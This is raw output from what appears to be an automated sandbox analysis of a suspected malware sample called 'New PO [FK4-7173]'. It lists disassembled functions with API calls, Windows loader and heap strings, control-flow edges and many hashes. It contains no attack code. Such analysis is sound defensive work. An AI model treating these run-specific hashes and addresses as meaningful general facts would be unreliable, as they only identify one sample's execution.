                                                                          • Instruction Fuzzy Hash: 82018872E0011C7ADB11A6E19C81DEFBB7CEF41798F44806AFA14A7241D6784E0687A5
                                                                          Function 00414384 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49threadwindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 53 414384-41438a 54 414360 53->54 55 41438c-414399 53->55 56 414362-41436c PostThreadMessageW 54->56 57 41436e 54->57 58 41439b-41439f 55->58 56->57 61 414370-41437a 57->61 62 41437d-414383 57->62 59 4143a1-4143a6 58->59 60 4143bd-4143c3 58->60 59->60 63 4143a8-4143ad 59->63 60->58 64 4143c5-4143c8 60->64 61->62 63->60 65 4143af-4143b6 63->65 66 4143c9-4143cc 65->66 67 4143b8-4143bb 65->67 67->60 67->66
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(784DRh-0,00000111,00000000,00000000), ref: 0041436A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 784DRh-0$784DRh-0
                                                                          • API String ID: 1836367815-4127946399
                                                                          • Opcode ID: 6be040e405ce50ce3ae29167226121218c95c22ed370a53f3c77e8a630e6fd68
                                                                          • Instruction ID: a4d452bf66df7087786c1f340b92f9d75e604bc5a560d2f74ca6e29db7655123
                                                                          • Opcode Fuzzy Hash: 6be040e405ce50ce3ae29167226121218c95c22ed370a53f3c77e8a630e6fd68
                                                                          • Instruction Fuzzy Hash: EB014930B10A0D6DE72049784C82DF77BA9DBC6378B4543AFED78C62F2C71648868659
                                                                          Function 004142D3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40threadwindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 68 4142d3-4142d7 69 4142d9-4142e4 68->69 70 41433d 68->70 71 41434c-41435d 70->71 72 41433f-414346 70->72 74 41437d-414383 71->74 75 41435f-41436e PostThreadMessageW 71->75 72->71 75->74 77 414370-41437a 75->77 77->74
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(784DRh-0,00000111,00000000,00000000), ref: 0041436A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 784DRh-0$784DRh-0
                                                                          • API String ID: 1836367815-4127946399
                                                                          • Opcode ID: 7fe7ab53a8b72d8110235178bf50f83df38a1a6bfe9e1708d784f1cebd7b1672
                                                                          • Instruction ID: 092f99b1063f204a1ffe16679252a9bf0ab38d026d634f450ff8e875147877fb
                                                                          • Opcode Fuzzy Hash: 7fe7ab53a8b72d8110235178bf50f83df38a1a6bfe9e1708d784f1cebd7b1672
                                                                          • Instruction Fuzzy Hash: 44F0BB73B4020C6BCB1186D498828EDF7A8DB91364B0580A7ED68D7300E6394D564792
                                                                          Function 0042CBF3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 329 42cbf3-42cc37 call 404883 call 42daf3 RtlAllocateHeap
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(?,0041E83E,?,?,00000000,?,0041E83E,?,?,?), ref: 0042CC32
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: f3c4bfe748aee5f79c30733d82bb22a8bdbc0cc9349a50e4ec151a19655b4f43
                                                                          • Instruction ID: ce4eb1cadc5ff27fdd349975a30cb3fe45b7434915a305475e9dae0bef05c602
                                                                          • Opcode Fuzzy Hash: f3c4bfe748aee5f79c30733d82bb22a8bdbc0cc9349a50e4ec151a19655b4f43
                                                                          • Instruction Fuzzy Hash: ADE06DB62042157BD714EE59EC41FAB77ACEFC5714F004419FE08A7282D671B9118BB4
                                                                          Function 0042CC43 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 334 42cc43-42cc87 call 404883 call 42daf3 RtlFreeHeap
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,53018BFC,00000007,00000000,00000004,00000000,00417327,000000F4), ref: 0042CC82
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: 8db1d79ff8238bdfb9d132a70cabf39af3aecf4ce2d1295515a4cc0715655a43
                                                                          • Instruction ID: a5815567e2c3714858d1fd0615a94c9655945d8b487928513126b1e05d42e7a7
                                                                          • Opcode Fuzzy Hash: 8db1d79ff8238bdfb9d132a70cabf39af3aecf4ce2d1295515a4cc0715655a43
                                                                          • Instruction Fuzzy Hash: 1AE06D722042487BD614EE59DC42FDB77ACEFC5714F404459FE08A7241C7B5B9108BB4
                                                                          Function 0042CC93 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,687431D7,?,?,687431D7), ref: 0042CCCA
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          • Opcode ID: 568ccc1f3058b8e81a7f771b16e3d9bedb5980306b512f02f701c594623e9ece
                                                                          • Instruction ID: 6cb9b1892721896b4f1e72b111b09b886103da18cd2019c687b9e37c9a2f4172
                                                                          • Opcode Fuzzy Hash: 568ccc1f3058b8e81a7f771b16e3d9bedb5980306b512f02f701c594623e9ece
                                                                          • Instruction Fuzzy Hash: EAE08676644214BBD220FB6ADC42FDB776CEFC5714F40852AFA0867142CAB5790587F4
                                                                          Function 01172C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 602256cd8125a1c08e55479d784888a33d626a111dbe9dd60da4e5cb77bd214d
                                                                          • Instruction ID: 69b80a47a956ff265647d40ed8c76c50f6b2576196c2c32d41ba07d2277e0a37
                                                                          • Opcode Fuzzy Hash: 602256cd8125a1c08e55479d784888a33d626a111dbe9dd60da4e5cb77bd214d
                                                                          • Instruction Fuzzy Hash: C7B09B719015C5C5DA15F7644708717791577D0701F65C061D3030655F4738C1D1E675

                                                                          Non-executed Functions

                                                                          Function 011B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-2160512332
                                                                          • Opcode ID: 95fef494bf873a445176d833e969a8ff272d2d578f045ffb9b56561843fe8aa8
                                                                          • Instruction ID: beed454ef2577ef9899c85f85cc66970771ab7ead898c4c1113ead54b31d794d
                                                                          • Opcode Fuzzy Hash: 95fef494bf873a445176d833e969a8ff272d2d578f045ffb9b56561843fe8aa8
                                                                          • Instruction Fuzzy Hash: 9E92A071604742AFE729DF29C884FABB7E8BB88754F04492DFA94D7250D770E848CB52
                                                                          Function 01168620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Thread identifier, xrefs: 011A553A
                                                                          • Critical section address, xrefs: 011A5425, 011A54BC, 011A5534
                                                                          • 8, xrefs: 011A52E3
                                                                          • double initialized or corrupted critical section, xrefs: 011A5508
                                                                          • corrupted critical section, xrefs: 011A54C2
                                                                          • undeleted critical section in freed memory, xrefs: 011A542B
                                                                          • Critical section address., xrefs: 011A5502
                                                                          • Address of the debug info found in the active list., xrefs: 011A54AE, 011A54FA
                                                                          • Critical section debug info address, xrefs: 011A541F, 011A552E
                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011A54CE
                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 011A5543
                                                                          • Invalid debug info address of this critical section, xrefs: 011A54B6
                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011A540A, 011A5496, 011A5519
                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011A54E2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                          • API String ID: 0-2368682639
                                                                          • Opcode ID: 8f98c95e747f3762e7e6907f48e4a54ee4eb8777c6110ce041ee28dbd3b88c95
                                                                          • Instruction ID: c5f611a99c7add780a3efd322ce08d074a25578b7d21897e3cc7bfa2d10f1672
                                                                          • Opcode Fuzzy Hash: 8f98c95e747f3762e7e6907f48e4a54ee4eb8777c6110ce041ee28dbd3b88c95
                                                                          • Instruction Fuzzy Hash: D381BDB5A44358EFDB68CF99C844BAEBBBAFB48704F548129F504B7640D371A941CB60
                                                                          Function 011629F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 011A2409
                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011A25EB
                                                                          • @, xrefs: 011A259B
                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011A24C0
                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 011A2624
                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011A22E4
                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 011A2498
                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 011A2602
                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 011A261F
                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 011A2506
                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 011A2412
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                          • API String ID: 0-4009184096
                                                                          • Opcode ID: 097a43af7b9e9d302defe2bdc0624ac8c27397f41aeef26f84185a68b5b96197
                                                                          • Instruction ID: 17ed47733738c2902891e72837741efe767e5a9a747b3bf2a9459c5f6e1d9a7f
                                                                          • Opcode Fuzzy Hash: 097a43af7b9e9d302defe2bdc0624ac8c27397f41aeef26f84185a68b5b96197
                                                                          • Instruction Fuzzy Hash: AD0280B5D002299FDB39DB54CC80BE9BBB8AF54304F4141EAEA09A7241E7319F94CF59
                                                                          Function 011D8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                          • API String ID: 0-2515994595
                                                                          • Opcode ID: 3269b84564eefde410a371ed70fa4b344b391e6b265527a75f7e0d8c9d9b4a0a
                                                                          • Instruction ID: da3bf3997cab9f924b7f2d378c4d5efa96f00cfb3ffb3346d269263c7df90e70
                                                                          • Opcode Fuzzy Hash: 3269b84564eefde410a371ed70fa4b344b391e6b265527a75f7e0d8c9d9b4a0a
                                                                          • Instruction Fuzzy Hash: A851AF715047519BD32EDF188944BABBBECEF94254F144A1EE999C3284E7B0E604C7A2
                                                                          Function 011E0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                          • API String ID: 0-1700792311
                                                                          • Opcode ID: 4036e3921e2f3643093cb84e42dc507469eba8f7c57771d6f898e5b4ada93011
                                                                          • Instruction ID: d0c43c84e470e92b7ec3f57d998f1370da0ae544af06db2e102f84351e4e36e7
                                                                          • Opcode Fuzzy Hash: 4036e3921e2f3643093cb84e42dc507469eba8f7c57771d6f898e5b4ada93011
                                                                          • Instruction Fuzzy Hash: F5D1DC71A04A82EFDB2EDFA8D448AADBBF1FF49704F088049F4459B252D7B49981CF14
                                                                          Function 011B89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 011B8A3D
                                                                          • VerifierFlags, xrefs: 011B8C50
                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 011B8A67
                                                                          • VerifierDebug, xrefs: 011B8CA5
                                                                          • AVRF: -*- final list of providers -*- , xrefs: 011B8B8F
                                                                          • HandleTraces, xrefs: 011B8C8F
                                                                          • VerifierDlls, xrefs: 011B8CBD
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                          • API String ID: 0-3223716464
                                                                          • Opcode ID: 9274da9582fdb2f0e455670b54df372c73a3a7c59b7cafb96f574bad2c742ced
                                                                          • Instruction ID: fd1421261e275faa116049dbbbebf5427049e4f2480b8ad5ce476bc397e8bdae
                                                                          • Opcode Fuzzy Hash: 9274da9582fdb2f0e455670b54df372c73a3a7c59b7cafb96f574bad2c742ced
                                                                          • Instruction Fuzzy Hash: 439133B2A45326BFD72EEF2898C0BEE77A8AB54F18F454559FA406B280C730DC01C795
                                                                          Function 0113EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                          • API String ID: 0-1109411897
                                                                          • Opcode ID: adcf7000d8f4da21e6a5424e459e747e314cc8f29216dcd4e275afc0a1086ddd
                                                                          • Instruction ID: 71c0f66ca94aabbbbc4877c4db518339a95cf4757636f75f4969735932ea0152
                                                                          • Opcode Fuzzy Hash: adcf7000d8f4da21e6a5424e459e747e314cc8f29216dcd4e275afc0a1086ddd
                                                                          • Instruction Fuzzy Hash: C0A24774E0562A8BDF68CF18C9887ADBBB5AF85304F1442E9D91DA7254DB309E86CF01
                                                                          Function 011663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-792281065
                                                                          • Opcode ID: 08ab488f4369e345f7b17dd0dd586db43cb97c9ab3d646870425ab1c4205b916
                                                                          • Instruction ID: 310863f024868b38ee874d56efc4124acae1708c0fc63d0be81aebc554500f8f
                                                                          • Opcode Fuzzy Hash: 08ab488f4369e345f7b17dd0dd586db43cb97c9ab3d646870425ab1c4205b916
                                                                          • Instruction Fuzzy Hash: 19914731B00315ABEB3DDF18E848BAE7FA5FF50B28F584129E9006BA85D7B59801C791
                                                                          Function 0112645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01189A01
                                                                          • apphelp.dll, xrefs: 01126496
                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01189A2A
                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011899ED
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01189A11, 01189A3A
                                                                          • LdrpInitShimEngine, xrefs: 011899F4, 01189A07, 01189A30
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-204845295
                                                                          • Opcode ID: f98aa90e0d97d89e99522f4b36fccde84a01552afed3e07985276046e2d9e74b
                                                                          • Instruction ID: e7d85ec0dc7f7d3380b5c9b2dd266e150047463a3fa05a0f0746d6e7a2f425ed
                                                                          • Opcode Fuzzy Hash: f98aa90e0d97d89e99522f4b36fccde84a01552afed3e07985276046e2d9e74b
                                                                          • Instruction Fuzzy Hash: 2E51D371208314AFE72DEF24D885BABB7E4FB84648F10491DF98597194E730E904CB92
                                                                          Function 01162674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RtlGetAssemblyStorageRoot, xrefs: 011A2160, 011A219A, 011A21BA
                                                                          • SXS: %s() passed the empty activation context, xrefs: 011A2165
                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011A21BF
                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 011A219F
                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 011A2178
                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 011A2180
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                          • API String ID: 0-861424205
                                                                          • Opcode ID: 1ae7934e6f00f78e96fa12094a7b78dcf37f0b583b19a611264b2b459e60f4f5
                                                                          • Instruction ID: b30aa4400e7a85fa5368b343c61b510e884175cf151891543b8bfec4b19219a7
                                                                          • Opcode Fuzzy Hash: 1ae7934e6f00f78e96fa12094a7b78dcf37f0b583b19a611264b2b459e60f4f5
                                                                          • Instruction Fuzzy Hash: 1331E93AF4021577E72D8A998C81F5ABE6CDB65A94F054069FA0467284E370AA01C7A1
                                                                          Function 0116C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 011A8181, 011A81F5
                                                                          • LdrpInitializeProcess, xrefs: 0116C6C4
                                                                          • LdrpInitializeImportRedirection, xrefs: 011A8177, 011A81EB
                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 011A81E5
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0116C6C3
                                                                          • Loading import redirection DLL: '%wZ', xrefs: 011A8170
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                          • API String ID: 0-475462383
                                                                          • Opcode ID: b7ec13f231d1d8c1d3016fc833f090d503dec108f2641389213828978360206b
                                                                          • Instruction ID: a443850a5e60294b3bc00bc4a2742a5acb911258fe026b0b7d2750c271f0499b
                                                                          • Opcode Fuzzy Hash: b7ec13f231d1d8c1d3016fc833f090d503dec108f2641389213828978360206b
                                                                          • Instruction Fuzzy Hash: FD31E472644346AFD32CEF28D945E2ABBA4BF94B24F040558F9856B395E720EC04C7A2
                                                                          Function 0117096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 01172DF0: LdrInitializeThunk.NTDLL ref: 01172DFA
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170BA3
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170BB6
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170D60
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170D74
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 1404860816-0
                                                                          • Opcode ID: 88f470a21c0c3f1a73074fdba65d4fcad792826bba499eed42902064766334f4
                                                                          • Instruction ID: 5bbc92a196f0a04557fe03ebbd3a866c6a9303af66ec10db269181e3101e1f0d
                                                                          • Opcode Fuzzy Hash: 88f470a21c0c3f1a73074fdba65d4fcad792826bba499eed42902064766334f4
                                                                          • Instruction Fuzzy Hash: BC426C75900715DFDB29CF28C840BAABBF5FF09314F1445AAE9899B341E770AA84CF61
                                                                          Function 0113A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                          • API String ID: 0-379654539
                                                                          • Opcode ID: d6ec26467a0dcdac7442154c17a977f7d5835b15b67179d7c645f486eccda12e
                                                                          • Instruction ID: d526508362fff4dd3664915997531bffd71c310cfefbdc40134234cb90178021
                                                                          • Opcode Fuzzy Hash: d6ec26467a0dcdac7442154c17a977f7d5835b15b67179d7c645f486eccda12e
